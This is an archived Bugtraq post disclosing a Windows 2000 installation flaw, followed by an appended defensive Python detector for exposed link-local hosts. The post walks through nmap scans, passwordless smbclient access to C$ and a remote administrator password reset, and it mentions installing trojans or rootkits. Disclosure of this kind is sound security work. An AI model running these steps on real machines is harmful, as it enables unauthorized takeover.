[13979] in bugtraq
Re: Windows 2000 installation process weakness
daemon@ATHENA.MIT.EDU (Stephane Aubert)
Wed Feb 23 12:39:38 2000
Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Message-Id: <20000223145747.P4500@safe.hsc.fr>
Date: Wed, 23 Feb 2000 14:57:47 +0100
Reply-To: Stephane.Aubert@HSC.FR
From: Stephane Aubert <Stephane.Aubert@HSC.FR>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20000215155750.M4500@safe.hsc.fr>
Hello,
As a lot of people asked me for information on the insecure win2k pro
installation process, we wish to provide further information on this
vulnerability.
All these tests have been made and checked with Denis Ducamp and
Alain Thivillon, 2 serious security experts.
What we have done:
1. Install the final release of win2k pro (build 2195)
2. Do not give any IP address during the install. If no DHCP server
is responding, the win2k pro box takes 169.254.153.13 as IP address.
(The address range used is 169.254.0.0/16, which is registered
with the IANA as the LINKLOCAL net.)
Notice: if a real IP address is given by the admin or a DHCP server
you can connect directly, and jump to step 4 right now.
3. On your favorite Linux (or *BSD) box add an alias to the interface:
# ifconfig eth0:0 169.254.153.11
4. Just after the configuration of COM+ by win2k you can ping or scan it :
% nmap 169.254.153.13
Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on (169.254.153.13):
Port State Protocol Service
139 open tcp netbios-ssn
# nmap -sU -p 1-200 169.254.153.13
Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on (169.254.153.13):
Port State Protocol Service
137 open udp netbios-ns
138 open udp netbios-dgm
Notice: the administrator has already entered a password !!!
5. By now, you can connect via SMB (smbclient for example)
to the C$ or ADMIN$ share WITHOUT ANY PASSWORD !!!
This lasts until win2k asks the admin to reboot the computer.
Notice: it's possible to use NAT (netbios auditing tool)
to obtain the netbios name of the windows box and the shares.
% ./smbclient //groar/c$ -I 169.254.153.13 -U administrator
added interface ip=169.254.153.12 bcast=169.254.153.31 nmask=255.255.255.224
Password: <EMPTY>
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \> ls
IO.SYS HSR 40992 Tue May 31 06:22:00 1994
MSDOS.SYS HSR 38166 Tue May 31 06:22:00 1994
COMMAND.COM R 56286 Tue May 31 06:22:00 1994
WINA20.386 A 9349 Tue May 31 06:22:00 1994
CONFIG.SYS A 638 Fri Feb 18 15:34:00 2000
AUTOEXEC.BAT A 690 Fri Feb 18 15:33:10 2000
6. Worse !
You can SET (remotely) a new administrator password:
% ./smbpasswd -U administrator -r groar
Old SMB password: <EMPTY>
New SMB password: <NEWPASS>
Retype new SMB password: <NEWPASS>
startsmbfilepwent: unable to open file /usr/local/samba/private/smbpasswd
unable to open smb password database.
Password changed for user administrator.
By now, nobody - even the administrator - even after the reboot - can
connect (remotely or locally) without the NEW password.
The administrator has to crack his own computer ;-))
7. Worse !
It is also (evidently) possible to transfer a trojan onto the new
computer, or just a rootkit (www.rootkit.com), in order to keep
administrator privileges for a long time :(
Regards,
Stéphane
--
Stephane AUBERT -=- Herve Schauer Consultants
Stephane.Aubert@hsc.fr http://www.hsc.fr/
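A defender-side check for the exposure pattern this post describes, added here as an example and not part of the original message: it parses nmap port tables (the old "Port State Protocol" layout shown above and the later "port/proto" layout, the latter an assumption about format) and flags hosts that sit on a link-local 169.254.0.0/16 address while NetBIOS ports are open, i.e. machines that look like a Windows 2000 box still in setup. The sample scan text is constructed from the output in the post.

```python
import ipaddress
import re

# Link-local (APIPA) range a win2k box falls back to when no DHCP server answers
LINKLOCAL = ipaddress.ip_network("169.254.0.0/16")
# NetBIOS services the post shows open during setup
NETBIOS = {("tcp", 139), ("udp", 137), ("udp", 138)}

HOST_RE = re.compile(r"Interesting ports on .*?\((\d+\.\d+\.\d+\.\d+)\)")
OLD_PORT_RE = re.compile(r"^\s*(\d+)\s+open\s+(tcp|udp)\s+\S+")   # nmap 2.x: "139 open tcp netbios-ssn"
NEW_PORT_RE = re.compile(r"^\s*(\d+)/(tcp|udp)\s+open\s+\S+")     # later nmap: "139/tcp open netbios-ssn"

def parse_nmap(text):
    """Map each scanned host to the set of (proto, port) pairs reported open."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.search(line)
        if m:
            current = m.group(1)
            hosts.setdefault(current, set())
            continue
        m = OLD_PORT_RE.match(line) or NEW_PORT_RE.match(line)
        if m and current is not None:
            hosts[current].add((m.group(2), int(m.group(1))))
    return hosts

def install_window_hosts(hosts):
    """Hosts on a link-local address with NetBIOS open: the profile of a box
    in the middle of setup, before the admin password takes effect and it reboots."""
    flagged = {}
    for ip, ports in hosts.items():
        exposed = sorted(NETBIOS & ports)
        if exposed and ipaddress.ip_address(ip) in LINKLOCAL:
            flagged[ip] = exposed
    return flagged

# Constructed sample: the two scans from the post, plus a normally addressed host
SAMPLE = """
Interesting ports on (169.254.153.13):
Port State Protocol Service
139 open tcp netbios-ssn
Interesting ports on (169.254.153.13):
Port State Protocol Service
137 open udp netbios-ns
138 open udp netbios-dgm
Interesting ports on (10.0.0.5):
139/tcp open netbios-ssn
"""

if __name__ == "__main__":
    for ip, ports in install_window_hosts(parse_nmap(SAMPLE)).items():
        print(ip, ports)
```

Run it over a saved scan of the installation VLAN; any host it reports should be isolated until its setup has completed and rebooted.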